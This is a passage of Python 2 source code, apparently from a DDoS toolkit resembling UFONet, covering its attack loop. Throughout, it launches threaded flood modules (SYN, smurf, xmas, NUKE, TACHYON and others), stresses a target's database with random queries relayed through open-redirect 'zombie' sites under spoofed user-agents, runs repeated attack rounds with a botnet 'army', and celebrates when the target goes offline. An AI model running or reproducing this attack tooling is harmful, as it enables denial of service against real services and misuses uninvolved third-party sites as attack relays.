 3696. if self.options.nuke < 1:
 3697. self.options.nuke = 10000
 3698. self.instance = NUKE() # instance main class for NUKE operations
 3699. t7 = threading.Thread(target=self.instance.attacking, args=(target, self.options.nuke)) # NUKE using threads
 3700. t7.daemon = True # extra weapons are threaded as daemons
 3701. t7.start()
 3702. self.update_nuke_stats() # add new NUKE attack to mothership stats
 3703. else:
 3704. print "\n[Info] [AI] Your OS cannot perform this attack... -> [Passing!]\n"
 3705. if tachyon:
 3706. try:
 3707. self.options.tachyon = int(tachyon)
 3708. except:
 3709. self.options.tachyon = 1000 # default TACHYON requests
 3710. if self.options.tachyon < 1:
 3711. self.options.tachyon = 1000
 3712. self.instance = TACHYON() # instance main class for TACHYON operations
 3713. t8 = threading.Thread(target=self.instance.attacking, args=(target, self.options.tachyon)) # TACHYON using threads
 3714. t8.daemon = True
 3715. t8.start()
 3716. self.update_tachyon_stats() # add new TACHYON attack to mothership stats
 3717. def stressing(self, target, zombie):
 3718. # perform a DDoS Web attack against a target, requesting records on target's database
 3719. options = self.options
 3720. db_input = self.options.dbstress
 3721. def random_key(length):
 3722. key = ''
 3723. for i in range(length):
 3724. key += random.choice(string.lowercase + string.uppercase + string.digits)
 3725. return key
 3726. # generating random alphanumeric queries
 3727. if self.db_flash > 9: # set db flash start on: 10
 3728. length = 1024 # search a heavy random length query (db flash): 1024
 3729. self.db_flash = 0 # reset db flash counter
 3730. else:
 3731. length = 1 # search for one different (alphanumeric) character each time will produces more positive results on db
 3732. key = str(random_key(length))
 3733. if self.db_flash > 9:
 3734. print "\n[Info] [DBStress] Trying database request to: " + db_input + " | Query used: db flash! " + "(" + str(length) + " chars)"
 3735. else:
 3736. print "\n[Info] [DBStress] Trying database request to: " + db_input + " | Query used: " + key
 3737. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 3738. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 3739. if not target.endswith('/'): # add "/" to end of target
 3740. target = target + "/"
 3741. url = zombie + target + db_input + key
 3742. req = urllib2.Request(url, None, headers)
 3743. if options.proxy: # set proxy
 3744. self.proxy_transport(options.proxy)
 3745. try:
 3746. req_reply = urllib2.urlopen(req, context=self.ctx).read()
 3747. except urllib2.HTTPError, e:
 3748. if e.code == 401:
 3749. print '[Info] [DBStress] Not authorized'
 3750. elif e.code == 404:
 3751. print '[Info] [DBStress] Not found'
 3752. elif e.code == 503:
 3753. print '[Info] [DBStress] Service unavailable'
 3754. else:
 3755. print '[Info] [DBStress] Unknown error'
 3756. else:
 3757. print '[Info] [DBStress] Database query: HIT!'
 3758. def attackme(self, zombies):
 3759. # perform a DDoS Web attack against yourself
 3760. print "[AI] Starting local port to listening at: " + self.port + "\n"
 3761. print '='*21 + "\n"
 3762. self.doll=Doll(self)
 3763. self.doll.start()
 3764. while not self.doll._armed:
 3765. time.sleep(1)
 3766. # send Open Redirect injection (multiple zombies-multiple target urls)
 3767. target = ""
 3768. self.injection(target, zombies)
 3769. self.doll.shutdown()
 3770. self.doll.join()
 3771. self.herd.list_fails()
 3772. def check_target_status(self):
 3773. if self.num_is_down > 0 and self.num_is_up == 0: # check for: 1 or more down, 0 up
 3774. print "\n[Info] [AI] Congratulations!! -> [Target looks OFFLINE!]\n"
 3775. if not self.options.forceyes:
 3776. update_reply = raw_input("[AI] Do you want to send a [HEAD] check request? (y/N)")
 3777. print "\n" + '-'*25
 3778. else:
 3779. update_reply = "N"
 3780. if update_reply == "y" or update_reply == "Y":
 3781. try: # send HEAD connection
 3782. self.head = True
 3783. reply = self.connect_zombie(target)
 3784. self.head = False
 3785. if reply:
 3786. print "\n[Info] [AI] [Control] Target has replied you! -> [Keep shooting!]\n"
 3787. else:
 3788. print "\n[Info] [AI] " + target + " -> [TANGO DOWN!!!]\n"
 3789. self.update_targets_crashed() # update targets crashed stats
 3790. self.update_mothership_stats() # update mothership completed attack stats
 3791. except Exception:
 3792. print "\n[Error] [AI] Something wrong with your connection!...\n"
 3793. if self.options.verbose:
 3794. traceback.print_exc()
 3795. return
 3796. else:
 3797. print "\n[Info] [AI] " + target + " -> [TANGO DOWN!!!]\n"
 3798. self.update_targets_crashed() # update targets crashed stats
 3799. self.update_mothership_stats() # update mothership completed attack stats
 3800. return
 3801. def starting_target_check(self, target, head_check):
 3802. options = self.options
 3803. head_check_here = False
 3804. head_check_external = False
 3805. if options.disablehead: # check at start is disabled (skipping!)
 3806. print "[Info] [AI] Skipping external check...\n"
 3807. head_check_here = True
 3808. head_check_external = True
 3809. else:
 3810. if head_check:
 3811. if not options.attackme:
 3812. print "[AI] Launching: 'Is target up?' check...\n"
 3813. try: # send HEAD connection
 3814. self.head = True
 3815. reply = self.connect_zombie(target)
 3816. self.head = False
 3817. if reply:
 3818. print "[Info] [AI] [Control] From YOU: YES -> ["+str(reply)+"-OK]"
 3819. head_check_here = True
 3820. else:
 3821. print "[Info] [AI] [Control] From YOU: NO -> [Target looks OFFLINE!]"
 3822. head_check_here = False
 3823. except Exception:
 3824. print "[Error] [AI] [Control] From YOU: NO -> [Cannot connect!]"
 3825. if self.options.verbose:
 3826. traceback.print_exc()
 3827. head_check_here = False
 3828. else: # check if local IP/PORT is listening on mothership
 3829. print "[AI] Launching: 'Is NAT ready?' check...\n"
 3830. try:
 3831. sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
 3832. result = sock.connect_ex(('0.0.0.0',8080))
 3833. if result == 0 or result == 110: # black magic
 3834. print "[Info] [AI] [Control] Local port: YES | Mothership accesible from -private- IP: http://0.0.0.0:8080"
 3835. head_check_here = True
 3836. else:
 3837. print "[Info] [AI] [Control] Local port: NO | Something goes wrong with your port: 8080"
 3838. head_check_here = False
 3839. except Exception:
 3840. print "[Error] [AI] [Control] Local port: NO | Something wrong checking for open ports..."
 3841. if self.options.verbose:
 3842. traceback.print_exc()
 3843. head_check_here = False
 3844. else:
 3845. head_check_here = True
 3846. # check target using external check services
 3847. self.external = True
 3848. if not options.attackme:
 3849. try:
 3850. url = self.external_check_service1 + target # check from external service [1]
 3851. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 3852. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 3853. if options.proxy: # set proxy
 3854. self.proxy_transport(options.proxy)
 3855. req = urllib2.Request(url, None, headers)
 3856. external_reply = urllib2.urlopen(req, context=self.ctx).read()
 3857. if "It's just you" in external_reply:
 3858. t = urlparse(self.external_check_service1)
 3859. name_external1 = t.netloc
 3860. print "[Info] [AI] [Control] From OTHERS: YES -> ["+name_external1+"]"
 3861. head_check_external = True
 3862. else:
 3863. url = self.external_check_service2 + target # check from external service [2]
 3864. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 3865. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 3866. if options.proxy: # set proxy
 3867. self.proxy_transport(options.proxy)
 3868. req = urllib2.Request(url, None, headers)
 3869. req_reply = urllib2.urlopen(req, context=self.ctx).read()
 3870. if 'returned code 200 OK and is up' in req_reply:
 3871. t = urlparse(self.external_check_service2)
 3872. name_external2 = t.netloc
 3873. print "[Info] [AI] [Control] From OTHERS: YES -> ["+name_external2+"]"
 3874. head_check_external = True
 3875. else:
 3876. print "[Info] [AI] [Control] From OTHERS: NO -> [Target looks OFFLINE!]"
 3877. head_check_external = False
 3878. except Exception:
 3879. print "[Error] [AI] [Control] From OTHERS: NO -> [Cannot connect!]"
 3880. head_check_external = False
 3881. else:
 3882. try: # check mothership from public ip / NAT using HEAD request
 3883. try:
 3884. conn = httplib.HTTPConnection(str(self.pub_ip), 8080, timeout=10)
 3885. conn.request("HEAD", "/")
 3886. reply = conn.getresponse()
 3887. except Exception:
 3888. reply = None
 3889. if reply:
 3890. print "[Info] [AI] [Control] From OTHERS: YES -> [Mothership OK!] -> ["+str(self.pub_ip)+":8080]"
 3891. head_check_external = True
 3892. else:
 3893. print "[Info] [AI] [Control] From OTHERS: NO -> [Cannot connect!] -> [NAT is failing!]"
 3894. head_check_external = False
 3895. head_check_here = False # stop attack if not public IP available
 3896. except Exception:
 3897. print "[Error] [AI] [Control] From OTHERS: NO -> [Check failed!]"
 3898. head_check_here = False # stop attack if not public IP available
 3899. if self.options.verbose:
 3900. traceback.print_exc()
 3901. head_check_external = False
 3902. self.external = False
 3903. return head_check_here, head_check_external
 3904. def injection(self, target, zombies, head_check = True):
 3905. options = self.options
 3906. # check target's integrity at start
 3907. head_check_here, head_check_external = self.starting_target_check(target, head_check)
 3908. # ask user to confirm the attack
 3909. if head_check_here == True or head_check_external == True:
 3910. if not self.options.forceyes:
 3911. if not options.attackme:
 3912. if not options.disablehead:
 3913. start_reply = raw_input("\n[AI] Target is ONLINE!. Do you want to start an attack? (y/N)\n")
 3914. else:
 3915. start_reply = raw_input("\n[AI] Do you want to start an attack, directly? (y/N)\n")
 3916. else:
 3917. if not options.disablehead:
 3918. start_reply = raw_input("\n[AI] Mothership is READY!. Do you want to start an attack 'against yourself'? (y/N)\n")
 3919. else:
 3920. start_reply = raw_input("\n[AI] Do you want to start an attack 'against yourself', directly? (y/N)\n")
 3921. else:
 3922. start_reply = "Y"
 3923. if start_reply == "y" or start_reply == "Y":
 3924. if options.attackme:
 3925. total_rounds = "2" # default rounds for attackme
 3926. else:
 3927. total_rounds = options.rounds # extract number of rounds
 3928. if total_rounds <= "0":
 3929. total_rounds = "1"
 3930. self.herd.cleanup()
 3931. num_round = 1
 3932. num_hits = 0
 3933. num_zombie = 1
 3934. # start to attack the target with [MODS]
 3935. if options.loic or options.loris or options.ufosyn or options.spray or options.smurf or options.xmas or options.nuke or options.tachyon:
 3936. ex = threading.Thread(target=self.aiming_extra_weapons, args=(target, self.options.proxy, self.options.loic, self.options.loris, self.options.ufosyn, self.options.spray, self.options.smurf, self.options.xmas, self.options.nuke, self.options.tachyon)) # multithreading flow for extra attacks
 3937. ex.daemon = True # extra weapons are threaded as daemons
 3938. ex.start()
 3939. # start to attack the target with [ARMY]
 3940. zombies = self.extract_zombies() # extract zombies from file
 3941. if zombies:
 3942. self.total_zombie = len(zombies)
 3943. else:
 3944. self.total_zombie = 0
 3945. return
 3946. self.herd=Herd(self)
 3947. if not self.options.disablepurge:
 3948. self.discardzombies = []
 3949. self.discard_aliens = []
 3950. self.discard_droids = []
 3951. self.discard_rpcs = []
 3952. self.discard_ucavs = []
 3953. total_disc_zombies = 0
 3954. self.num_discard_zombies = 0
 3955. self.num_discard_aliens = 0
 3956. self.num_discard_droids = 0
 3957. self.num_discard_rpcs = 0
 3958. self.num_discard_ucavs = 0
 3959. self.empty_zombies = False
 3960. for i in range(0, int(total_rounds)): # start attacking using rounds
 3961. print ("\x1b[2J\x1b[H")# clear screen (black magic)
 3962. print '='*42
 3963. print 'Starting round:', num_round, ' of ', total_rounds
 3964. print '='*42
 3965. self.herd.reset()
 3966. self.extra_zombies_lock = True
 3967. self.total_zombies_failed_connection = 0 # reset failed [Zombies] connection counter each round
 3968. self.send_zombies(zombies) # send [Zombies]
 3969. if not self.options.attackme:
 3970. if not self.options.disablealiens or not self.options.disabledroids or not self.options.disablerpcs or not self.options.disableucavs:
 3971. if self.options.verbose:
 3972. print "[Info] [AI] [Control] All [Zombies] have returned for this round... -> [Waiting!]"
 3973. self.send_extra_zombies() # send [ARMY]
 3974. while self.extra_zombies_lock == True:
 3975. time.sleep(1) # wait for [ARMY] to return
 3976. if self.options.verbose:
 3977. print "\n" + '='*42
 3978. print "\n[Info] [AI] [Control] Full [ARMY] has returned for this round! -> [Refolding!]"
 3979. else:
 3980. zombies_lock = 0
 3981. if self.options.expire: # set timing for purge
 3982. try:
 3983. timing = int(self.options.expire)
 3984. except:
 3985. timing = self.expire_timing # default timing for purge
 3986. else:
 3987. timing = self.expire_timing # default timing for purge
 3988. if timing < 1:
 3989. timing = self.expire_timing # default timing for purge
 3990. zombies_arrival_timing = timing # timing = trying to control round time for threading flow
 3991. while self.herd.no_more_zombies() == False: # waiting for [Zombies] to return
 3992. zombies_lock = zombies_lock + 1
 3993. if zombies_lock > zombies_arrival_timing: # execute main abandoning routine!
 3994. if self.options.verbose:
 3995. print "[Info] [AI] [Control] Return time set [~"+str(zombies_arrival_timing)+"] for [Zombies] is over! -> [Expiring!]"
 3996. break
 3997. else:
 3998. time.sleep(1)
 3999. if self.options.verbose:
 4000. print "\n" + '='*42
 4001. print "\n[Info] [AI] [Control] All [Zombies] have returned for this round! -> [Refolding!]"
 4002. if not self.options.attackme and not self.options.disableucavs: # check for target's status returned by [UCAVs]
 4003. self.check_target_status()
 4004. if not self.options.attackme and not self.options.disablepurge: # enable [Zombies] purge round check
 4005. self.abandoning_zombies() # check for abandoning zombies
 4006. for zombie in self.herd.done: # check for num hits
 4007. if self.herd.connection_failed(zombie) == False:
 4008. num_hits = num_hits + 1
 4009. num_zombie = num_zombie + 1
 4010. if num_zombie > self.total_zombie:
 4011. num_zombie = 1
 4012. if not self.options.attackme and not self.options.disablescanner: # perform a broadband test on target
 4013. check_is_loading = self.check_is_loading(target)
 4014. self.herd.dump_html()
 4015. if not self.options.disablepurge:
 4016. if self.empty_zombies == True:
 4017. break # exit routine when not any more zombies
 4018. num_round = num_round + 1
 4019. if self.options.verbose:
 4020. print "\n" + '='*42
 4021. print "\n[Info] [AI] This battle is over! -> [Reporting!]"
 4022. if self.options.target_list:
 4023. self.num_target_list = self.num_target_list - 1 # num_target_list = 0 provokes exit!
 4024. print ("\x1b[2J\x1b[H") # black magic
 4025. if not self.options.attackme: # show herd results
 4026. self.herd.dump()
 4027. else: # show doll results
 4028. print '='*21
 4029. print "\n[Info] [AI] Mothership transmission...\n"
 4030. num_real_zombies = len(self.doll.real_zombies)
 4031. print "[Info] [AI] Total of [Zombies] that are 100% vulnerable to Open Redirect (CWE-601): " + str(num_real_zombies) + "\n"
 4032. for z in self.doll.real_zombies: # show only alien verified zombies
 4033. for x in z:
 4034. print " - " + str(x)
 4035. self.herd.dump_html(True) # show (all) zombies statistics
 4036. if not self.options.attackme:
 4037. if not self.options.disablepurge:
 4038. print "\n[Info] [AI] Report completed! -> [Purging!]\n"
 4039. else:
 4040. if not options.target_list:
 4041. print "\n[Info] [AI] Report completed! -> [Exiting!]\n"
 4042. else:
 4043. print "\n[Info] [AI] Report completed! -> [OK!]\n"
 4044. self.update_mothership_stats() # update mothership stats
 4045. if not self.options.disablepurge:
 4046. print '='*21+ "\n"
 4047. total_disc_zombies = self.num_discard_zombies + self.num_discard_aliens + self.num_discard_droids + self.num_discard_rpcs + self.num_discard_ucavs
 4048. if total_disc_zombies > 0 and total_disc_zombies < 2:
 4049. print "[Info] [AI] [Control] You have [" + str(total_disc_zombies) + "] unit that isn't working as expected...\n"
 4050. elif total_disc_zombies > 1:
 4051. print "[Info] [AI] [Control] You have [" + str(total_disc_zombies) + "] units that aren't working as expected...\n"
 4052. if self.num_discard_zombies > 0:
 4053. print " + Zombies: ["+ str(self.num_discard_zombies)+"]"
 4054. if self.num_discard_aliens > 0:
 4055. print " + Aliens : ["+ str(self.num_discard_aliens)+"]"
 4056. if self.num_discard_droids > 0:
 4057. print " + Droids : ["+ str(self.num_discard_droids)+"]"
 4058. if self.num_discard_rpcs > 0:
 4059. print " + X-RPCs : ["+ str(self.num_discard_rpcs)+"]"
 4060. if self.num_discard_ucavs > 0:
 4061. print " + UCAVs : ["+ str(self.num_discard_ucavs)+"]"
 4062. if total_disc_zombies > 0:
 4063. if not self.options.forceyes:
 4064. if total_disc_zombies > 0 and total_disc_zombies < 2:
 4065. backup_reply = raw_input("\n[AI] Do you want to purge it from your files? (Y/n)\n")
 4066. elif total_disc_zombies > 1:
 4067. backup_reply = raw_input("\n[AI] Do you want to purge them from your files? (Y/n)\n")
 4068. else:
 4069. backup_reply = "Y"
 4070. if backup_reply == "y" or backup_reply == "Y":
 4071. print "\n[Info] [AI] Purging failed units from files...\n"
 4072. discarded = []
 4073. if self.num_discard_zombies > 0:
 4074. for z in self.discardzombies:
 4075. discarded.append(z)
 4076. print " + [Info] [Zombies] "+z+" -> [Purged!]"
 4077. if self.num_discard_aliens > 0:
 4078. for a in self.discard_aliens:
 4079. discarded.append(a)
 4080. print " + [Info] [Aliens] "+a+" -> [Purged!]"
 4081. if self.num_discard_droids > 0:
 4082. for d in self.discard_droids:
 4083. discarded.append(d)
 4084. print " + [Info] [Droids] "+d+" -> [Purged!]"
 4085. if self.num_discard_rpcs > 0:
 4086. for r in self.discard_rpcs:
 4087. discarded.append(r)
 4088. print " + [Info] [X-RPCs] "+r+" -> [Purged!]"
 4089. if self.num_discard_ucavs > 0:
 4090. for u in self.discard_ucavs:
 4091. discarded.append(u)
 4092. print " + [Info] [UCAVs] "+u+" -> [Purged!]"
 4093. disc_zombies = self.discard_zombies(discarded) # discard zombies (remove from files)
 4094. if disc_zombies > 0 and disc_zombies < 2:
 4095. print "\n[Info] [AI] You have removed ["+str(disc_zombies)+"] unit! -> [OK!]\n"
 4096. elif disc_zombies > 1:
 4097. print "\n[Info] [AI] You have removed ["+str(disc_zombies)+"] units! -> [OK!]\n"
 4098. if not self.options.target_list:
 4099. print '-'*21+ "\n"
 4100. print "[AI] "+self.exit_msg+"\n"
 4101. if not self.options.web:
 4102. return
 4103. else:
 4104. if self.num_target_list > 0: # still more targets
 4105. print '-'*21+ "\n"
 4106. print "[Info] [AI] Attack against: "+str(target)+" -> [Finished!]\n"
 4107. return
 4108. else: # finish attack from multiple targets
 4109. print '-'*21+ "\n"
 4110. print "[Info] [AI] Attack against: "+str(target)+" -> [Finished!]"
 4111. print "\n"+ '='*21+ "\n"
 4112. print "[Info] [AI] All your battles have ended! -> [Exiting!]"
 4113. print "\n"+ '-'*21+ "\n"
 4114. print "[AI] "+self.exit_msg+"\n"
 4115. if not self.options.web:
 4116. return
 4117. else:
 4118. if num_real_zombies < 1: # not any 100% vulnerable zombie found
 4119. print "\n[Info] [AI] [Control] Not any 100% vulnerable zombie found! -> [Exiting!]\n"
 4120. if os.path.exists('mothership') == True:
 4121. os.remove('mothership') # remove mothership stream
 4122. if os.path.exists('alien') == True:
 4123. os.remove('alien') # remove random alien worker
 4124. if not options.web:
 4125. sys.exit(2) # exit
 4126. else:
 4127. return
 4128. else:
 4129. print "\n" + '='*21
 4130. AI_reply = raw_input("\n[AI] Do you prefer a 'fortune' cookie instead? (y/N)\n")
 4131. if AI_reply == "y" or AI_reply == "Y":
 4132. self.AI() # AI fortune cookie
 4133. print '-'*21+ "\n"
 4134. print "\n[AI] "+self.exit_msg+"\n"
 4135. if os.path.exists('mothership') == True:
 4136. os.remove('mothership') # remove mothership stream
 4137. if os.path.exists('alien') == True:
 4138. os.remove('alien') # remove random alien worker
 4139. if not options.web:
 4140. sys.exit(2) # exit
 4141. else:
 4142. return
 4143. else:
 4144. if not options.attackme:
 4145. print "\n[Info] [AI] "+target+" -> [Target looks OFFLINE!]"
 4146. else:
 4147. print "\n[Error] [AI] NAT is not working correctly! -> [Exiting!]"
 4148. print "\n" + '-'*21
 4149. print "\n[AI] "+self.exit_msg+"\n"
 4150. if os.path.exists('mothership') == True:
 4151. os.remove('mothership') # remove mothership stream
 4152. if os.path.exists('alien') == True:
 4153. os.remove('alien') # remove random alien worker
 4154. return
 4155. if __name__ == "__main__":
 4156. app = UFONet()
 4157. options = app.create_options()
 4158. if options:
 4159. app.run()